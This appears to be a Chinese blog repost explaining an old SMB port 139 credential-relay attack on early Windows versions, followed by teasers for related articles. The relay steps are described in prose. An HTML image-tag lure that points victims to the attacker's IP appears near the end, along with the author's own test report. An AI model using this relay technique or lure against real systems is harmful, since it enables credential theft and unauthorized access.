談黑客實戰 系統洩露密碼入侵攻擊分析

2021-12-29 20:38:23 字數 1843 閱讀 9959

windows訪問139埠時自動用當前使用者、密碼連線,造成洩露使用者密碼,雖然其密碼是加密的,但一樣可以用來攻擊。

下面是smb的密碼認證方式。

windows的139口的訪問過程,箭頭表示資料方向:

1.客戶端服務端

2.客戶端-------客戶端型別、支援的服務方式列表等---------->服務端

3.客戶端

認證方式就是使用者級認證還是共享級認證和密碼加密不,key是伺服器隨機生成的8個位元組,win2000已經支援16個位元組的 key。

4.客戶端--------------使用者名稱、加密後密碼----------------->服務端

win9x、winnt、win2000這有個漏洞,不經過提示等就把當前使用者名稱,密碼加密後發過去了,導致密碼洩漏。這兒加密是des的變形,lockedpass=chgdes(key,pass)。這兒的pass是作為des變形的key,key是作為des變形的待加密資料。

5.客戶端

windows客戶端第4步有漏洞,顯然服務端可以得到username和lockedpass=chgdes(key,pass), 其中key可以自由指定,因為這是服務方提供的,usname、pass是客戶端當前訪問者使用者名稱和密碼。這兒的加密變換不可逆,但已經可以用暴力法破解了,也已經有了這樣的程式。其實我們有時並不一定要得到密碼明文的,只要能提供連線需要的就可以了。我們來看得到lockedpass有什麼用,我們反過去訪問看看,telnet、ftp等連線要密碼明文我們得到的lockedpass不能提供,那麼我們考慮用同樣加密演算法傳密碼密文的服務呢?比如就是netbios共享服務。前面是服務端得到東西,那現在就是站在客戶端了,再看前面那過程,顯然其實我們並不需要提供pass,是不是只需要提供username和lockedpass2=chgdes(key2,pass)就可以了?其中key2是現在的服務端提供的。看看我們有 usname和lockedpass=chgdes(key,pass)其中key我們可以自己指定,大家一看顯然只要key=key2那麼就需要的我們都有了是不是?所以我們要使得key=key2.

好我們再仔細看看連線過程,別人連線兩步1、2:

1.客戶端服務端

2.客戶端-------客戶端型別、支援的服務方式列表等---------->服務端

下面就該

3.客戶端

這我們需要提供key,這兒我們不能隨便提供key,需要提供key2,那麼我們就要得到key2,顯然需要連線netbios服務回去。顯然這而需要連線回去的11,22,33共3步(為了區分連線回去的步子用重號表示)才能得到key2,顯然這2步和3步不需要有先後順序。所以我們可以得到連線指定ip的netbios服務然後等這使用者來訪問,這可能有時間超時等處理,或者等到任意ip連線netbios服務後馬上連回去,反正怎麼處理方便、滿足需要就怎麼處理。

下面顯然就是設定 key=key2返回3,那就等4得到lockedpass了,第5步嘛就你自由處理了,要不返回密碼錯誤,後面就是44、55……

總的來就是1,2,11,22,33,3,4,5,44,55……顯然你就是以那機器訪問你的使用者的身份去訪問他的netbios服務了,能幹什麼那就看那使用者的許可權了。

注意有興趣的可以把samb包的客戶端程式修改加上一點服務的前幾步就可以了。顯然這主要利用的還是windows洩露當前使用者名稱、加密密碼漏洞。還有這需要別人來訪問你的機器,這好辦,郵件或者主頁等裡面來個

imgsrc」="file://ip/filename" ...

就可以了。我實驗了去掉機器139口服務(要不有139口要影響後面埠重定向),用埠重定向程式把來向139口定向回去,找另乙個winnt機器用\ip訪問那重定向139口的機器,結果是沒有密碼提示就看到winnt機器本身了。其實這時重定向埠程式那台機器已經用winnt機器的當前使用者訪問winnt了,只是由於沒有客戶端的處理介面不能操作。

CSND密碼洩露談登陸安全

今天面試的時候,問到安全問題。登陸的時候,如何保證密碼的安全。首先想到的是加密,我也是這麼想的,md5加密,或sha加密。但是想md5加密是有問題的。比方說簡單的密碼123456 進行加密後 16位 49ba59abbe56e057 32位 e10adc3949ba59abbe56e057f20f8...

微軟系統洩露密碼入侵分析

windows訪問139埠時自動用當前使用者 密碼連線,造成洩露使用者密碼,雖然其密碼是加密的,但一樣可以用來攻擊。下面是smb的密碼認證方式。windows的139口的訪問過程,箭頭表示資料方向 1。客戶端 建立tcp連線 服務端 2。客戶端 客戶端型別 支援的服務方式列表等 服務端 3。客戶端 ...

《黑客攻防 系統實戰》 高階堆溢位

利用複雜的堆溢位的時候,ltrace 是最好的工具,碰到比較複雜的堆溢位的時候,則必須經歷幾個重要的步驟 1 使其標準化。這是指如果程序生成並呼叫execve,那麼就簡單地連線到這個程序 如果本地攻擊,將使用execve 啟動這個程序,重要的是了解堆怎樣被初始化的 2 為攻擊設定堆。這是指正確的大小...